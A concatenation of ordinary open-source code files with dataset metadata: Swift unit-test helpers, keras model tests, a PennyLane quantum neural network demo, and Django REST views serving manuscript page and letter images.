51252356b22a792599a401f40ede0b9fda9fccdc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Swift tests """
from __future__ import print_function
import os
import copy
import logging
import errno
from six.moves import range
import sys
from contextlib import contextmanager, closing
from collections import defaultdict, Iterable
import itertools
from numbers import Number
from tempfile import NamedTemporaryFile
import time
import eventlet
from eventlet.green import socket
from tempfile import mkdtemp
from shutil import rmtree
from swift.common.utils import Timestamp, NOTICE
from test import get_config
from swift.common import swob, utils
from swift.common.ring import Ring, RingData
from hashlib import md5
import logging.handlers
from six.moves.http_client import HTTPException
from swift.common import storage_policy
from swift.common.storage_policy import StoragePolicy, ECStoragePolicy
import functools
import six.moves.cPickle as pickle
from gzip import GzipFile
import mock as mocklib
import inspect
EMPTY_ETAG = md5().hexdigest()
# try not to import this module from swift
if not os.path.basename(sys.argv[0]).startswith('swift'):
# never patch HASH_PATH_SUFFIX AGAIN!
utils.HASH_PATH_SUFFIX = 'endcap'
def patch_policies(thing_or_policies=None, legacy_only=False,
with_ec_default=False, fake_ring_args=None):
if isinstance(thing_or_policies, (
Iterable, storage_policy.StoragePolicyCollection)):
return PatchPolicies(thing_or_policies, fake_ring_args=fake_ring_args)
if legacy_only:
default_policies = [
StoragePolicy(0, name='legacy', is_default=True),
]
default_ring_args = [{}]
elif with_ec_default:
default_policies = [
ECStoragePolicy(0, name='ec', is_default=True,
ec_type='jerasure_rs_vand', ec_ndata=10,
ec_nparity=4, ec_segment_size=4096),
StoragePolicy(1, name='unu'),
]
default_ring_args = [{'replicas': 14}, {}]
else:
default_policies = [
StoragePolicy(0, name='nulo', is_default=True),
StoragePolicy(1, name='unu'),
]
default_ring_args = [{}, {}]
fake_ring_args = fake_ring_args or default_ring_args
decorator = PatchPolicies(default_policies, fake_ring_args=fake_ring_args)
if not thing_or_policies:
return decorator
else:
# it's a thing, we return the wrapped thing instead of the decorator
return decorator(thing_or_policies)
class PatchPolicies(object):
"""
Why not mock.patch? In my case, when used as a decorator on the class it
seemed to patch setUp at the wrong time (i.e. in setup the global wasn't
patched yet)
"""
def __init__(self, policies, fake_ring_args=None):
if isinstance(policies, storage_policy.StoragePolicyCollection):
self.policies = policies
else:
self.policies = storage_policy.StoragePolicyCollection(policies)
self.fake_ring_args = fake_ring_args or [None] * len(self.policies)
def _setup_rings(self):
"""
Our tests tend to use the policies rings like their own personal
playground - which can be a problem in the particular case of a
patched TestCase class where the FakeRing objects are scoped in the
call to the patch_policies wrapper outside of the TestCase instance
which can lead to some bled state.
To help tests get better isolation without having to think about it,
here we're capturing the args required to *build* a new FakeRing
instances so we can ensure each test method gets a clean ring setup.
The TestCase can always "tweak" these fresh rings in setUp - or if
they'd prefer to get the same "reset" behavior with custom FakeRing's
they can pass in their own fake_ring_args to patch_policies instead of
setting the object_ring on the policy definitions.
"""
for policy, fake_ring_arg in zip(self.policies, self.fake_ring_args):
if fake_ring_arg is not None:
policy.object_ring = FakeRing(**fake_ring_arg)
def __call__(self, thing):
if isinstance(thing, type):
return self._patch_class(thing)
else:
return self._patch_method(thing)
def _patch_class(self, cls):
"""
Creating a new class that inherits from decorated class is the more
common way I've seen class decorators done - but it seems to cause
infinite recursion when super is called from inside methods in the
decorated class.
"""
orig_setUp = cls.setUp
orig_tearDown = cls.tearDown
def setUp(cls_self):
self._orig_POLICIES = storage_policy._POLICIES
if not getattr(cls_self, '_policies_patched', False):
storage_policy._POLICIES = self.policies
self._setup_rings()
cls_self._policies_patched = True
orig_setUp(cls_self)
def tearDown(cls_self):
orig_tearDown(cls_self)
storage_policy._POLICIES = self._orig_POLICIES
cls.setUp = setUp
cls.tearDown = tearDown
return cls
def _patch_method(self, f):
@functools.wraps(f)
def mywrapper(*args, **kwargs):
self._orig_POLICIES = storage_policy._POLICIES
try:
storage_policy._POLICIES = self.policies
self._setup_rings()
return f(*args, **kwargs)
finally:
storage_policy._POLICIES = self._orig_POLICIES
return mywrapper
def __enter__(self):
self._orig_POLICIES = storage_policy._POLICIES
storage_policy._POLICIES = self.policies
def __exit__(self, *args):
storage_policy._POLICIES = self._orig_POLICIES
class FakeRing(Ring):
def __init__(self, replicas=3, max_more_nodes=0, part_power=0,
base_port=1000):
"""
:param part_power: make part calculation based on the path
If you set a part_power when you setup your FakeRing the parts you get
out of ring methods will actually be based on the path - otherwise we
exercise the real ring code, but ignore the result and return 1.
"""
self._base_port = base_port
self.max_more_nodes = max_more_nodes
self._part_shift = 32 - part_power
# 9 total nodes (6 more past the initial 3) is the cap, no matter if
# this is set higher, or R^2 for R replicas
self.set_replicas(replicas)
self._reload()
def _reload(self):
self._rtime = time.time()
def set_replicas(self, replicas):
self.replicas = replicas
self._devs = []
for x in range(self.replicas):
ip = '10.0.0.%s' % x
port = self._base_port + x
self._devs.append({
'ip': ip,
'replication_ip': ip,
'port': port,
'replication_port': port,
'device': 'sd' + (chr(ord('a') + x)),
'zone': x % 3,
'region': x % 2,
'id': x,
})
@property
def replica_count(self):
return self.replicas
def _get_part_nodes(self, part):
return [dict(node, index=i) for i, node in enumerate(list(self._devs))]
def get_more_nodes(self, part):
for x in range(self.replicas, (self.replicas + self.max_more_nodes)):
yield {'ip': '10.0.0.%s' % x,
'replication_ip': '10.0.0.%s' % x,
'port': self._base_port + x,
'replication_port': self._base_port + x,
'device': 'sda',
'zone': x % 3,
'region': x % 2,
'id': x}
def write_fake_ring(path, *devs):
"""
Pretty much just a two node, two replica, 2 part power ring...
"""
dev1 = {'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1',
'port': 6000}
dev2 = {'id': 0, 'zone': 0, 'device': 'sdb1', 'ip': '127.0.0.1',
'port': 6000}
dev1_updates, dev2_updates = devs or ({}, {})
dev1.update(dev1_updates)
dev2.update(dev2_updates)
replica2part2dev_id = [[0, 1, 0, 1], [1, 0, 1, 0]]
devs = [dev1, dev2]
part_shift = 30
with closing(GzipFile(path, 'wb')) as f:
pickle.dump(RingData(replica2part2dev_id, devs, part_shift), f)
class FabricatedRing(Ring):
"""
When a FakeRing just won't do - you can fabricate one to meet
your tests needs.
"""
def __init__(self, replicas=6, devices=8, nodes=4, port=6000,
part_power=4):
self.devices = devices
self.nodes = nodes
self.port = port
self.replicas = 6
self.part_power = part_power
self._part_shift = 32 - self.part_power
self._reload()
def _reload(self, *args, **kwargs):
self._rtime = time.time() * 2
if hasattr(self, '_replica2part2dev_id'):
return
self._devs = [{
'region': 1,
'zone': 1,
'weight': 1.0,
'id': i,
'device': 'sda%d' % i,
'ip': '10.0.0.%d' % (i % self.nodes),
'replication_ip': '10.0.0.%d' % (i % self.nodes),
'port': self.port,
'replication_port': self.port,
} for i in range(self.devices)]
self._replica2part2dev_id = [
[None] * 2 ** self.part_power
for i in range(self.replicas)
]
dev_ids = itertools.cycle(range(self.devices))
for p in range(2 ** self.part_power):
for r in range(self.replicas):
self._replica2part2dev_id[r][p] = next(dev_ids)
class FakeMemcache(object):
def __init__(self):
self.store = {}
def get(self, key):
return self.store.get(key)
def keys(self):
return self.store.keys()
def set(self, key, value, time=0):
self.store[key] = value
return True
def incr(self, key, time=0):
self.store[key] = self.store.setdefault(key, 0) + 1
return self.store[key]
@contextmanager
def soft_lock(self, key, timeout=0, retries=5):
yield True
def delete(self, key):
try:
del self.store[key]
except Exception:
pass
return True
def readuntil2crlfs(fd):
rv = ''
lc = ''
crlfs = 0
while crlfs < 2:
c = fd.read(1)
if not c:
raise ValueError("didn't get two CRLFs; just got %r" % rv)
rv = rv + c
if c == '\r' and lc != '\n':
crlfs = 0
if lc == '\r' and c == '\n':
crlfs += 1
lc = c
return rv
def connect_tcp(hostport):
rv = socket.socket()
rv.connect(hostport)
return rv
@contextmanager
def tmpfile(content):
with NamedTemporaryFile('w', delete=False) as f:
file_name = f.name
f.write(str(content))
try:
yield file_name
finally:
os.unlink(file_name)
xattr_data = {}
def _get_inode(fd):
if not isinstance(fd, int):
try:
fd = fd.fileno()
except AttributeError:
return os.stat(fd).st_ino
return os.fstat(fd).st_ino
def _setxattr(fd, k, v):
inode = _get_inode(fd)
data = xattr_data.get(inode, {})
data[k] = v
xattr_data[inode] = data
def _getxattr(fd, k):
inode = _get_inode(fd)
data = xattr_data.get(inode, {}).get(k)
if not data:
raise IOError(errno.ENODATA, "Fake IOError")
return data
import xattr
xattr.setxattr = _setxattr
xattr.getxattr = _getxattr
@contextmanager
def temptree(files, contents=''):
# generate enough contents to fill the files
c = len(files)
contents = (list(contents) + [''] * c)[:c]
tempdir = mkdtemp()
for path, content in zip(files, contents):
if os.path.isabs(path):
path = '.' + path
new_path = os.path.join(tempdir, path)
subdir = os.path.dirname(new_path)
if not os.path.exists(subdir):
os.makedirs(subdir)
with open(new_path, 'w') as f:
f.write(str(content))
try:
yield tempdir
finally:
rmtree(tempdir)
def with_tempdir(f):
"""
Decorator to give a single test a tempdir as argument to test method.
"""
@functools.wraps(f)
def wrapped(*args, **kwargs):
tempdir = mkdtemp()
args = list(args)
args.append(tempdir)
try:
return f(*args, **kwargs)
finally:
rmtree(tempdir)
return wrapped
class NullLoggingHandler(logging.Handler):
def emit(self, record):
pass
class UnmockTimeModule(object):
"""
Even if a test mocks time.time - you can restore unmolested behavior in a
another module who imports time directly by monkey patching it's imported
reference to the module with an instance of this class
"""
_orig_time = time.time
def __getattribute__(self, name):
if name == 'time':
return UnmockTimeModule._orig_time
return getattr(time, name)
# logging.LogRecord.__init__ calls time.time
logging.time = UnmockTimeModule()
class FakeLogger(logging.Logger, object):
# a thread safe fake logger
def __init__(self, *args, **kwargs):
self._clear()
self.name = 'swift.unit.fake_logger'
self.level = logging.NOTSET
if 'facility' in kwargs:
self.facility = kwargs['facility']
self.statsd_client = None
self.thread_locals = None
self.parent = None
store_in = {
logging.ERROR: 'error',
logging.WARNING: 'warning',
logging.INFO: 'info',
logging.DEBUG: 'debug',
logging.CRITICAL: 'critical',
NOTICE: 'notice',
}
def notice(self, msg, *args, **kwargs):
"""
Convenience function for syslog priority LOG_NOTICE. The python
logging lvl is set to 25, just above info. SysLogHandler is
monkey patched to map this log lvl to the LOG_NOTICE syslog
priority.
"""
self.log(NOTICE, msg, *args, **kwargs)
def _log(self, level, msg, *args, **kwargs):
store_name = self.store_in[level]
cargs = [msg]
if any(args):
cargs.extend(args)
captured = dict(kwargs)
if 'exc_info' in kwargs and \
not isinstance(kwargs['exc_info'], tuple):
captured['exc_info'] = sys.exc_info()
self.log_dict[store_name].append((tuple(cargs), captured))
super(FakeLogger, self)._log(level, msg, *args, **kwargs)
def _clear(self):
self.log_dict = defaultdict(list)
self.lines_dict = {'critical': [], 'error': [], 'info': [],
'warning': [], 'debug': [], 'notice': []}
clear = _clear # this is a public interface
def get_lines_for_level(self, level):
if level not in self.lines_dict:
raise KeyError(
"Invalid log level '%s'; valid levels are %s" %
(level,
', '.join("'%s'" % lvl for lvl in sorted(self.lines_dict))))
return self.lines_dict[level]
def all_log_lines(self):
return dict((level, msgs) for level, msgs in self.lines_dict.items()
if len(msgs) > 0)
def _store_in(store_name):
def stub_fn(self, *args, **kwargs):
self.log_dict[store_name].append((args, kwargs))
return stub_fn
# mock out the StatsD logging methods:
update_stats = _store_in('update_stats')
increment = _store_in('increment')
decrement = _store_in('decrement')
timing = _store_in('timing')
timing_since = _store_in('timing_since')
transfer_rate = _store_in('transfer_rate')
set_statsd_prefix = _store_in('set_statsd_prefix')
def get_increments(self):
return [call[0][0] for call in self.log_dict['increment']]
def get_increment_counts(self):
counts = {}
for metric in self.get_increments():
if metric not in counts:
counts[metric] = 0
counts[metric] += 1
return counts
def setFormatter(self, obj):
self.formatter = obj
def close(self):
self._clear()
def set_name(self, name):
# don't touch _handlers
self._name = name
def acquire(self):
pass
def release(self):
pass
def createLock(self):
pass
def emit(self, record):
pass
def _handle(self, record):
try:
line = record.getMessage()
except TypeError:
print('WARNING: unable to format log message %r %% %r' % (
record.msg, record.args))
raise
self.lines_dict[record.levelname.lower()].append(line)
def handle(self, record):
self._handle(record)
def flush(self):
pass
def handleError(self, record):
pass
class DebugLogger(FakeLogger):
"""A simple stdout logging version of FakeLogger"""
def __init__(self, *args, **kwargs):
FakeLogger.__init__(self, *args, **kwargs)
self.formatter = logging.Formatter(
"%(server)s %(levelname)s: %(message)s")
def handle(self, record):
self._handle(record)
print(self.formatter.format(record))
class DebugLogAdapter(utils.LogAdapter):
def _send_to_logger(name):
def stub_fn(self, *args, **kwargs):
return getattr(self.logger, name)(*args, **kwargs)
return stub_fn
# delegate to FakeLogger's mocks
update_stats = _send_to_logger('update_stats')
increment = _send_to_logger('increment')
decrement = _send_to_logger('decrement')
timing = _send_to_logger('timing')
timing_since = _send_to_logger('timing_since')
transfer_rate = _send_to_logger('transfer_rate')
set_statsd_prefix = _send_to_logger('set_statsd_prefix')
def __getattribute__(self, name):
try:
return object.__getattribute__(self, name)
except AttributeError:
return getattr(self.__dict__['logger'], name)
def debug_logger(name='test'):
"""get a named adapted debug logger"""
return DebugLogAdapter(DebugLogger(), name)
original_syslog_handler = logging.handlers.SysLogHandler
def fake_syslog_handler():
for attr in dir(original_syslog_handler):
if attr.startswith('LOG'):
setattr(FakeLogger, attr,
copy.copy(getattr(logging.handlers.SysLogHandler, attr)))
FakeLogger.priority_map = \
copy.deepcopy(logging.handlers.SysLogHandler.priority_map)
logging.handlers.SysLogHandler = FakeLogger
if utils.config_true_value(
get_config('unit_test').get('fake_syslog', 'False')):
fake_syslog_handler()
class MockTrue(object):
"""
Instances of MockTrue evaluate like True
Any attr accessed on an instance of MockTrue will return a MockTrue
instance. Any method called on an instance of MockTrue will return
a MockTrue instance.
>>> thing = MockTrue()
>>> thing
True
>>> thing == True # True == True
True
>>> thing == False # True == False
False
>>> thing != True # True != True
False
>>> thing != False # True != False
True
>>> thing.attribute
True
>>> thing.method()
True
>>> thing.attribute.method()
True
>>> thing.method().attribute
True
"""
def __getattribute__(self, *args, **kwargs):
return self
def __call__(self, *args, **kwargs):
return self
def __repr__(*args, **kwargs):
return repr(True)
def __eq__(self, other):
return other is True
def __ne__(self, other):
return other is not True
@contextmanager
def mock(update):
returns = []
deletes = []
for key, value in update.items():
imports = key.split('.')
attr = imports.pop(-1)
module = __import__(imports[0], fromlist=imports[1:])
for modname in imports[1:]:
module = getattr(module, modname)
if hasattr(module, attr):
returns.append((module, attr, getattr(module, attr)))
else:
deletes.append((module, attr))
setattr(module, attr, value)
try:
yield True
finally:
for module, attr, value in returns:
setattr(module, attr, value)
for module, attr in deletes:
delattr(module, attr)
class FakeStatus(object):
"""
This will work with our fake_http_connect, if you hand in one of these
instead of a status int or status int tuple to the "codes" iter you can
add some eventlet sleep to the expect and response stages of the
connection.
"""
def __init__(self, status, expect_sleep=None, response_sleep=None):
"""
:param status: the response status int, or a tuple of
([expect_status, ...], response_status)
:param expect_sleep: float, time to eventlet sleep during expect, can
be a iter of floats
:param response_sleep: float, time to eventlet sleep during response
"""
# connect exception
if isinstance(status, (Exception, eventlet.Timeout)):
raise status
if isinstance(status, tuple):
self.expect_status = list(status[:-1])
self.status = status[-1]
self.explicit_expect_list = True
else:
self.expect_status, self.status = ([], status)
self.explicit_expect_list = False
if not self.expect_status:
# when a swift backend service returns a status before reading
# from the body (mostly an error response) eventlet.wsgi will
# respond with that status line immediately instead of 100
# Continue, even if the client sent the Expect 100 header.
# BufferedHttp and the proxy both see these error statuses
# when they call getexpect, so our FakeConn tries to act like
# our backend services and return certain types of responses
# as expect statuses just like a real backend server would do.
if self.status in (507, 412, 409):
self.expect_status = [status]
else:
self.expect_status = [100, 100]
# setup sleep attributes
if not isinstance(expect_sleep, (list, tuple)):
expect_sleep = [expect_sleep] * len(self.expect_status)
self.expect_sleep_list = list(expect_sleep)
while len(self.expect_sleep_list) < len(self.expect_status):
self.expect_sleep_list.append(None)
self.response_sleep = response_sleep
def get_response_status(self):
if self.response_sleep is not None:
eventlet.sleep(self.response_sleep)
if self.expect_status and self.explicit_expect_list:
raise Exception('Test did not consume all fake '
'expect status: %r' % (self.expect_status,))
if isinstance(self.status, (Exception, eventlet.Timeout)):
raise self.status
return self.status
def get_expect_status(self):
expect_sleep = self.expect_sleep_list.pop(0)
if expect_sleep is not None:
eventlet.sleep(expect_sleep)
expect_status = self.expect_status.pop(0)
if isinstance(expect_status, (Exception, eventlet.Timeout)):
raise expect_status
return expect_status
class SlowBody(object):
"""
This will work with our fake_http_connect, if you hand in these
instead of strings it will make reads take longer by the given
amount. It should be a little bit easier to extend than the
current slow kwarg - which inserts whitespace in the response.
Also it should be easy to detect if you have one of these (or a
subclass) for the body inside of FakeConn if we wanted to do
something smarter than just duck-type the str/buffer api
enough to get by.
"""
def __init__(self, body, slowness):
self.body = body
self.slowness = slowness
def slowdown(self):
eventlet.sleep(self.slowness)
def __getitem__(self, s):
return SlowBody(self.body[s], self.slowness)
def __len__(self):
return len(self.body)
def __radd__(self, other):
self.slowdown()
return other + self.body
def fake_http_connect(*code_iter, **kwargs):
class FakeConn(object):
def __init__(self, status, etag=None, body='', timestamp='1',
headers=None, expect_headers=None, connection_id=None,
give_send=None):
if not isinstance(status, FakeStatus):
status = FakeStatus(status)
self._status = status
self.reason = 'Fake'
self.host = '1.2.3.4'
self.port = '1234'
self.sent = 0
self.received = 0
self.etag = etag
self.body = body
self.headers = headers or {}
self.expect_headers = expect_headers or {}
self.timestamp = timestamp
self.connection_id = connection_id
self.give_send = give_send
if 'slow' in kwargs and isinstance(kwargs['slow'], list):
try:
self._next_sleep = kwargs['slow'].pop(0)
except IndexError:
self._next_sleep = None
# be nice to trixy bits with node_iter's
eventlet.sleep()
def getresponse(self):
exc = kwargs.get('raise_exc')
if exc:
if isinstance(exc, (Exception, eventlet.Timeout)):
raise exc
raise Exception('test')
if kwargs.get('raise_timeout_exc'):
raise eventlet.Timeout()
self.status = self._status.get_response_status()
return self
def getexpect(self):
expect_status = self._status.get_expect_status()
headers = dict(self.expect_headers)
if expect_status == 409:
headers['X-Backend-Timestamp'] = self.timestamp
response = FakeConn(expect_status,
timestamp=self.timestamp,
headers=headers)
response.status = expect_status
return response
def getheaders(self):
etag = self.etag
if not etag:
if isinstance(self.body, str):
etag = '"' + md5(self.body).hexdigest() + '"'
else:
etag = '"68b329da9893e34099c7d8ad5cb9c940"'
headers = swob.HeaderKeyDict({
'content-length': len(self.body),
'content-type': 'x-application/test',
'x-timestamp': self.timestamp,
'x-backend-timestamp': self.timestamp,
'last-modified': self.timestamp,
'x-object-meta-test': 'testing',
'x-delete-at': '9876543210',
'etag': etag,
'x-works': 'yes',
})
if self.status // 100 == 2:
headers['x-account-container-count'] = \
kwargs.get('count', 12345)
if not self.timestamp:
# when timestamp is None, HeaderKeyDict raises KeyError
headers.pop('x-timestamp', None)
try:
if next(container_ts_iter) is False:
headers['x-container-timestamp'] = '1'
except StopIteration:
pass
am_slow, value = self.get_slow()
if am_slow:
headers['content-length'] = '4'
headers.update(self.headers)
return headers.items()
def get_slow(self):
if 'slow' in kwargs and isinstance(kwargs['slow'], list):
if self._next_sleep is not None:
return True, self._next_sleep
else:
return False, 0.01
if kwargs.get('slow') and isinstance(kwargs['slow'], Number):
return True, kwargs['slow']
return bool(kwargs.get('slow')), 0.1
def read(self, amt=None):
am_slow, value = self.get_slow()
if am_slow:
if self.sent < 4:
self.sent += 1
eventlet.sleep(value)
return ' '
rv = self.body[:amt]
self.body = self.body[amt:]
return rv
def send(self, amt=None):
if self.give_send:
self.give_send(self.connection_id, amt)
am_slow, value = self.get_slow()
if am_slow:
if self.received < 4:
self.received += 1
eventlet.sleep(value)
def getheader(self, name, default=None):
return swob.HeaderKeyDict(self.getheaders()).get(name, default)
def close(self):
pass
timestamps_iter = iter(kwargs.get('timestamps') or ['1'] * len(code_iter))
etag_iter = iter(kwargs.get('etags') or [None] * len(code_iter))
if isinstance(kwargs.get('headers'), (list, tuple)):
headers_iter = iter(kwargs['headers'])
else:
headers_iter = iter([kwargs.get('headers', {})] * len(code_iter))
if isinstance(kwargs.get('expect_headers'), (list, tuple)):
expect_headers_iter = iter(kwargs['expect_headers'])
else:
expect_headers_iter = iter([kwargs.get('expect_headers', {})] *
len(code_iter))
x = kwargs.get('missing_container', [False] * len(code_iter))
if not isinstance(x, (tuple, list)):
x = [x] * len(code_iter)
container_ts_iter = iter(x)
code_iter = iter(code_iter)
conn_id_and_code_iter = enumerate(code_iter)
static_body = kwargs.get('body', None)
body_iter = kwargs.get('body_iter', None)
if body_iter:
body_iter = iter(body_iter)
def connect(*args, **ckwargs):
if kwargs.get('slow_connect', False):
eventlet.sleep(0.1)
if 'give_content_type' in kwargs:
if len(args) >= 7 and 'Content-Type' in args[6]:
kwargs['give_content_type'](args[6]['Content-Type'])
else:
kwargs['give_content_type']('')
i, status = next(conn_id_and_code_iter)
if 'give_connect' in kwargs:
give_conn_fn = kwargs['give_connect']
argspec = inspect.getargspec(give_conn_fn)
if argspec.keywords or 'connection_id' in argspec.args:
ckwargs['connection_id'] = i
give_conn_fn(*args, **ckwargs)
etag = next(etag_iter)
headers = next(headers_iter)
expect_headers = next(expect_headers_iter)
timestamp = next(timestamps_iter)
if status <= 0:
raise HTTPException()
if body_iter is None:
body = static_body or ''
else:
body = next(body_iter)
return FakeConn(status, etag, body=body, timestamp=timestamp,
headers=headers, expect_headers=expect_headers,
connection_id=i, give_send=kwargs.get('give_send'))
connect.code_iter = code_iter
return connect
@contextmanager
def mocked_http_conn(*args, **kwargs):
requests = []
def capture_requests(ip, port, method, path, headers, qs, ssl):
req = {
'ip': ip,
'port': port,
'method': method,
'path': path,
'headers': headers,
'qs': qs,
'ssl': ssl,
}
requests.append(req)
kwargs.setdefault('give_connect', capture_requests)
fake_conn = fake_http_connect(*args, **kwargs)
fake_conn.requests = requests
with mocklib.patch('swift.common.bufferedhttp.http_connect_raw',
new=fake_conn):
yield fake_conn
left_over_status = list(fake_conn.code_iter)
if left_over_status:
raise AssertionError('left over status %r' % left_over_status)
def make_timestamp_iter():
return iter(Timestamp(t) for t in itertools.count(int(time.time())))
| 32.14786
| 79
| 0.593682
|
4a07e214da6559f1f21091fb34de43b34c2eb016
| 1,201
|
py
|
Python
|
tests/models/test_model.py
|
yecharlie/convnet3d
|
0b2771eec149b196ef59b58d09eef71c9b201d40
|
[
"MIT"
] | 6
|
2020-03-12T10:28:41.000Z
|
2021-11-18T16:17:20.000Z
|
tests/models/test_model.py
|
yecharlie/convnet3d
|
0b2771eec149b196ef59b58d09eef71c9b201d40
|
[
"MIT"
] | null | null | null |
tests/models/test_model.py
|
yecharlie/convnet3d
|
0b2771eec149b196ef59b58d09eef71c9b201d40
|
[
"MIT"
] | 1
|
2019-08-01T02:50:05.000Z
|
2019-08-01T02:50:05.000Z
|
import keras
import pytest
from convnet3d.models import (
reductionModel,
submodels,
convnet3dModel
)
class TestReductionModel(object):
def test_TimeDistributed(self):
with pytest.raises(TypeError) :
roi_input = keras.layers.Input(shape=(10, 25, 60, 60, 1))
fpr_model = reductionModel()
outputs = keras.layers.TimeDistributed(fpr_model)(roi_input)
model = keras.models.Model(inputs=roi_input, outputs=outputs)
model.summary()
def test_inputs_outputs(self):
fpr_model = reductionModel()
assert isinstance(fpr_model.inputs, list)
assert isinstance(fpr_model.outputs, list)
def test_TimeDistributed_with_submodels(self):
roi_input = keras.layers.Input(shape=(10, 25, 60, 60, 1))
fpr_model = reductionModel()
sub_models = submodels(fpr_model)
sub_models_outputs = [keras.layers.TimeDistributed(subm)(roi_input) for subm in sub_models]
model = keras.models.Model(inputs=roi_input, outputs=sub_models_outputs)
model.summary()
class TestConvnet3dModel(object):
def test_simple(self):
model = convnet3dModel() # noqa: F841
| 32.459459
| 99
| 0.679434
|
4a07e3151369586ee287d1e30f50749534a9506b
| 2,599
|
py
|
Python
|
examples/CV2_quantum-neural-net.py
|
AroosaIjaz/Mypennylane
|
40f2219b5e048d4bd93df815811ca5ed3f5327fa
|
[
"Apache-2.0"
] | 1
|
2019-05-12T22:43:42.000Z
|
2019-05-12T22:43:42.000Z
|
examples/CV2_quantum-neural-net.py
|
shashanka300/pennylane
|
194ccd00a9a7f7075c37680c970e56bab4808e60
|
[
"Apache-2.0"
] | null | null | null |
examples/CV2_quantum-neural-net.py
|
shashanka300/pennylane
|
194ccd00a9a7f7075c37680c970e56bab4808e60
|
[
"Apache-2.0"
] | 1
|
2022-03-04T02:17:11.000Z
|
2022-03-04T02:17:11.000Z
|
"""Continuous-variable quantum neural network example.
In this demo we implement the photonic quantum neural net model
from Killoran et al. (arXiv:1806.06871) with the example
of function fitting.
"""
import pennylane as qml
from pennylane import numpy as np
from pennylane.optimize import AdamOptimizer
try:
dev = qml.device('strawberryfields.fock', wires=1, cutoff_dim=10)
except:
print("To run this demo you need to install the strawberryfields plugin...")
def layer(v):
""" Single layer of the quantum neural net.
Args:
v (array[float]): array of variables for one layer
"""
# Matrix multiplication of input layer
qml.Rotation(v[0], wires=0)
qml.Squeezing(v[1], 0., wires=0)
qml.Rotation(v[2], wires=0)
# Bias
qml.Displacement(v[3], 0., wires=0)
# Element-wise nonlinear transformation
qml.Kerr(v[4], wires=0)
@qml.qnode(dev)
def quantum_neural_net(var, x=None):
"""The quantum neural net variational circuit.
Args:
var (array[float]): array of variables
x (array[float]): single input vector
Returns:
float: expectation of Homodyne measurement on Mode 0
"""
# Encode input x into quantum state
qml.Displacement(x, 0., wires=0)
# "layer" subcircuits
for v in var:
layer(v)
return qml.expval.X(0)
def square_loss(labels, predictions):
""" Square loss function
Args:
labels (array[float]): 1-d array of labels
predictions (array[float]): 1-d array of predictions
Returns:
float: square loss
"""
loss = 0
for l, p in zip(labels, predictions):
loss = loss + (l - p) ** 2
loss = loss / len(labels)
return loss
def cost(var, features, labels):
"""Cost function to be minimized.
Args:
var (array[float]): array of variables
features (array[float]): 2-d array of input vectors
labels (array[float]): 1-d array of targets
Returns:
float: loss
"""
# Compute prediction for each input in data batch
preds = [quantum_neural_net(var, x=x) for x in features]
return square_loss(labels, preds)
# load function data
data = np.loadtxt("data/sine.txt")
X = data[:, 0]
Y = data[:, 1]
# initialize weights
np.random.seed(0)
num_layers = 4
var_init = 0.05 * np.random.randn(num_layers, 5)
# create optimizer
opt = AdamOptimizer(0.01, beta1=0.9, beta2=0.999)
# train
var = var_init
for it in range(500):
var = opt.step(lambda v: cost(v, X, Y), var)
print("Iter: {:5d} | Cost: {:0.7f} ".format(it + 1, cost(var, X, Y)))
| 23.414414
| 80
| 0.643324
|
4a07e3654c70c74eac4bf358a32f3b3bb49e3d31
| 2,993
|
py
|
Python
|
scripts/views.py
|
sul-cidr/scriptchart-backend
|
38bb4139d77d683d85f31839a1a06096fe2fabbc
|
[
"MIT"
] | 1
|
2019-06-05T23:05:32.000Z
|
2019-06-05T23:05:32.000Z
|
scripts/views.py
|
sul-cidr/scriptchart-backend
|
38bb4139d77d683d85f31839a1a06096fe2fabbc
|
[
"MIT"
] | 42
|
2019-01-24T23:51:42.000Z
|
2021-09-08T01:04:45.000Z
|
scripts/views.py
|
sul-cidr/scriptchart-backend
|
38bb4139d77d683d85f31839a1a06096fe2fabbc
|
[
"MIT"
] | 1
|
2019-08-05T12:47:57.000Z
|
2019-08-05T12:47:57.000Z
|
import pathlib
import requests
from io import BytesIO
from django.conf import settings
from django.http import HttpResponse
from rest_framework import generics
from PIL import Image
from scripts.models import Manuscript, Page, Coordinates
from scripts.serializers import (
ManuscriptSerializer, PageSerializer, CoordinatesSerializer)
class LetterImage(generics.ListAPIView):
def get(self, request, format=None):
page_url = self.request.GET.get('page_url')
x = int(self.request.GET.get('x', 0))
y = int(self.request.GET.get('y', 0))
w = int(self.request.GET.get('w', 0))
h = int(self.request.GET.get('h', 0))
img_path = None
if settings.IMAGES_ROOT is not None:
img_base = pathlib.Path(settings.IMAGES_ROOT)
path = page_url.replace(
'https://images.syriac.reclaim.hosting/', '')
img_path = img_base / path
if img_path and img_path.exists():
image = Image.open(img_path)
else:
image_response = requests.get(page_url, verify=True)
image = Image.open(BytesIO(image_response.content))
image_crop = image.crop([x, y, x + w, y + h])
response = HttpResponse(content_type="image/png")
image_crop.save(response, "PNG")
response['Content-Length'] = len(response.content)
return response
class ManuscriptList(generics.ListAPIView):
serializer_class = ManuscriptSerializer
def get_queryset(self):
queryset = Manuscript.objects.all()
display_flag = self.request.query_params.get('display', None)
if display_flag is not None:
queryset = queryset.exclude(display=False)
return queryset
class ManuscriptDetail(generics.RetrieveAPIView):
queryset = Manuscript.objects.all()
serializer_class = ManuscriptSerializer
class PageList(generics.ListAPIView):
serializer_class = PageSerializer
def get_queryset(self):
queryset = Page.objects.all()
manuscript_id = self.request.query_params.get('manuscript_id', None)
if manuscript_id is not None:
queryset = queryset.filter(manuscript_id=manuscript_id)
return queryset
class PageDetail(generics.RetrieveAPIView):
queryset = Page.objects.all()
serializer_class = PageSerializer
class CoordinatesList(generics.ListAPIView):
serializer_class = CoordinatesSerializer
def get_queryset(self):
queryset = Coordinates.objects.all()
page_id = self.request.query_params.get('page_id', None)
letter_id = self.request.query_params.get('letter_id', None)
if page_id is not None:
queryset = queryset.filter(page_id=page_id)
if letter_id is not None:
queryset = queryset.filter(letter_id=letter_id)
return queryset
class CoordinatesDetail(generics.RetrieveAPIView):
queryset = Coordinates.objects.all()
serializer_class = CoordinatesSerializer
| 31.840426
